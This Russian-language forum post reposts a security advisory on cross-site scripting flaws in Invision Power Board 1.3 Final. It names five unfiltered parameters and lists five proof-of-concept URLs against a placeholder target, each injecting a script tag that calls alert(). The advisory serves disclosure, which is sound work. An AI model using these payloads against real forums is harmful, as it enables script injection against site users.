CyberPilgrim
Advanced Member | Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Межсайтовый скриптинг в Invision Power Board Программа: Invision Power Board 1.3 Final Опасность: Низкая Наличие эксплоита: Да Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в Invision Power Board. Удаленный пользователь может выполнить XSS нападение. Параметры 'c', 'f', 'showtopic', 'showuser', и 'username' не фильтруют HTML код, представленный пользователем: Код: _http://[target]/?c='><script>alert(window.document.url)</script><plain text> _http://[target]/?showtopic='><script>alert(window.document.url)</script><plaintext> _http://[target]/?act=SR&f='><script>alert(document.Cracker)</script> _http://[target]/?showuser='><script>alert(document.Cracker)</script> _http://[target]/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.Cracker)</script> | Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. |